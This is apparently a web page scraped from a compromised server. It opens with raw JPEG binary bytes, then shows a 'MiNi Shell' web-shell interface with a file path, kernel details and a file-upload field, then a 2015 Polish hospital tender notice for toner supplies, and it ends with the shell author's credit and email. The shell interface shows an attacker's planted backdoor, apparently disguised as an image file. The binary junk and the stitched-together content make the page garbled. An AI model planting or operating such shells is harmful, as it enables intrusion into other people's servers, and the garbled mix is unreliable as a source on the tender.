JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150108/4604-N-2015.html

<p class="kh_header"><b>Warszawa: P/2/TONERY/2015 na dostawę tonerów</b><br>
<b>Numer ogłoszenia: 4604 - 2015; data zamieszczenia: 08.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny "INFLANCKA" im. Krysi Niżyńskiej "Zakurzonej" , ul. Inflancka 6, 00-189 Warszawa, woj. mazowieckie, tel. 022 831-37-01, faks 635 84 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inflancka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> P/2/TONERY/2015 na dostawę tonerów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa tonerów na zasadach określonych niniejszą
SIWZ. Szczegółowy wykaz tonerów zawiera formularz cenowy (załącznik nr 2 do
SIWZ).
Przedmiot zamówienia obejmuje dostawę tonerów w podziale na następujące części:
Część nr 1-Oryginały
Część nr 2- Zamienniki
Część nr 3-Bębny/Pojemniki
 Miejsce dostawy tonerów: Szpital Specjalistyczny INFLANCKA im. Krysi
Niżyńskiej Zakurzonej SPZOZ, Warszawa, ul. Inflancka 6.
Wielkość i asortyment dostaw będzie uzależniony od bieżących potrzeb
Zamawiającego. Podane ilości mają charakter szacunkowy i mogą ulec zmianie
(zwiększyć się lub zmniejszyć). Zamawiającemu przysługuje prawo wyboru ilości
zamawianego asortymentu w granicach określonych wartością umowy.
Termin dostarczenia zamawianego asortymentu - 2 dni robocze od zgłoszenia
(dopuszcza się składanie zamówienia w formie pisemnej, faxem lub przez telefon).
Nazwa i kod Wspólnego Słownika Zamówień (CPV) - 30.12.51.00-2, 30.19.21.13-6,
30.19.23.20-0 Zamawiający nie gwarantuje każdorazowo dojazdu do Szpitala ani wjazdu na jego teren.
Zamawiający dopuszcza składanie ofert równoważnych z zastrzeżeniem, że
oferowane produkty spełniają n/w warunki:
- ich stosowanie nie naruszy praw gwarancyjnych producenta sprzętu, dla których sąprzeznaczone,
- są fabrycznie nowe, nie gorszej jakości niż produkty oryginalne,
- posiadają znak firmowy producenta oraz etykiety identyfikujące dany produkt,
- ich jakość i parametry techniczne, i eksploatacyjne nie mogą być gorsze niż produktu oryginalnego.
Zamawiający wymaga dostawy produktów, których parametry techniczne i eksploatacyjne są zgodne z opisem zawartym w opisie przedmiotu zamówienia, i gwarantują pełną kompatybilność ze sprzętem użytkowanym przez Zamawiającego.
Zamawiający informuje, że będzie żądał od Wykonawcy wykazania, że oferowane
przez niego produkty równoważne spełniają wymagania określone przez
Zamawiającego w formularzu cenowym (art. 30 ust. 5 ustawy Pzp).
Za produkt równoważny Zamawiający uznaje produkt, który w porównaniu z
wyrobem oryginalnym charakteryzuje się porównywalną, tj. taką samą bądź lepszą
jakością, niezawodnością, parametrami technicznymi i eksploatacyjnymi.
W przypadku stwierdzenia w trakcie realizacji umowy, że parametry techniczne
i eksploatacyjne, jakość lub niezawodność dostarczonych przez Wykonawcę
produktów równoważnych odbiegają na niekorzyść od parametrów technicznych,
i eksploatacyjnych jakości, i niezawodności produktu oryginalnego - Zamawiający
będzie żądał od Wykonawcy wymiany produktu na nowy. W przypadkudostarczenia produktów równoważnych Wykonawca gwarantuje:
- zwrot kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie za
stosowanie dostarczonego równoważnego materiału eksploatacyjnego,
- bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii będzie
zastosowanie dostarczonych równoważnych materiałów eksploatacyjnych w
przypadku gdy naprawa nie przywróci jego pełnej użyteczności,
- w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych równoważnych
materiałów eksploatacyjnych utraci gwarancję producenta urządzeń - Wykonawca
przejmie wszelkie obowiązki gwarancyjne dotyczące tych urządzeń.
Za tusz Zamawiający uznaje wkład drukujący do drukarek atramentowych, natomiast za toner - wkład drukujący do drukarek laserowych, faksów i kopiarek posiadających pojemnik na proszek barwiący.
Za produkt oryginalny Zamawiający uznaje materiał wyprodukowany przez
producenta drukarek, faksów i kopiarek, do których jest przeznaczony. Za produkt równoważny Zamawiający uznaje produkt, który w porównaniu z
wyrobem oryginalnym charakteryzuje się porównywalną, tj. taką samą bądź lepszą
jakością wydruku, szybkością schnięcia, kolorystyką, wydajnością oraz zapewnia
takie same funkcje, np. informacje o stanie zużycia wkładu. Dla tonerów
monochromatycznych wydajność jest określana zgodnie z normą ISO/IEC19752, dla
tonerów kolorowych wydajność jest określana zgodnie z normą ISO/IEC19798, dla
atramentowych wkładów kolorowych wydajność określana jest zgodnie z normą
ISO/IEC24711.
W przypadku stwierdzenia w takcie realizacji umowy, że wydajność, jakość lub
niezawodność dostarczonych przez Wykonawcę produktów odbiega na niekorzyść od parametrów produktu oryginalnego albo produkt ten nie będzie we właściwy sposób sygnalizował stanu zużycia tuszu lub tonera - Zamawiający będzie żądał od
Wykonawcy zamiany produktu na nowy.
 Zamawiający wymaga, aby zaoferowane materiały i urządzenia posiadały
wymagane przepisami aprobaty techniczne i świadectwa dopuszczenia do stosowania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.19.21.13-6, 30.19.23.20-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku w tym zakresie - Oświadczenie - zał. nr 3.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku w tym zakresie - Oświadczenie - zał. nr 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku w tym zakresie - Oświadczenie - zał. nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku w tym zakresie - Oświadczenie - zał. nr 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku w tym zakresie - Oświadczenie - zał. nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty (według wzoru załącznika nr 1 do SIWZ),
 formularz cenowy (według wzoru załącznika nr 2 do SIWZ),
certyfikaty zgodności na dostarczone materiały,
Ew. pełnomocnictwo lub upoważnienie do podpisania oferty (oryginał lub kopia poświadczona
notarialnie), o ile sposób reprezentacji nie wynika z innych dokumentów
załączonych przez Wykonawcę,
Oświadczenie o spełnieniu warunków zgodnie z art.26 ust. 2d</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany stawki podatku VAT z tym, iż zmiana taka obciąża Wykonawcę (wartość umowy
brutto nie może ulec zmianie);
. zmniejszenia / zwiększenia ilości dostarczanego asortymentu;
. terminu wykonania zamówienia (wydłużenie terminu zamówienia w przypadku nie wykorzystania
wartości umowy w ciągu 24 miesięcy);
. zmian wynikających ze zmian przepisów prawnych związanych z umową zgodnie z
terminem obowiązywania ww. przepisów;
. zmian osób upoważnionych do kontaktów od obu stron umowy,
. zmiany ilości sztuk w opakowaniu/wielkości opakowania (inny sposób konfekcjonowania)
z zachowaniem ogólnej (łącznej) zamawianej ilości danego towaru po wyrażeniu
zgody przez Zamawiającego,
. zmian produktów (nazwa katalogowa) lub wycofania z produkcji,
. zmiany daty obowiązywania umowy, w wyniku opóźnień związanych z czynnikami zewnętrznymi,
na które Zamawiający nie miał wpływu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ipzp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny INFLANCKA
im. Krysi Niżyńskiej Zakurzonej
ul. Inflancka 6, 00-189 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2015 godzina 09:00, miejsce: Szpital Specjalistyczny INFLANCKA
im. Krysi Niżyńskiej Zakurzonej
ul. Inflancka 6, 00-189 Warszawa
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> oryginały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> oryginały.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zamienniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zamienniki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> bębny/pojemniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bębny/pojemniki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.20-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com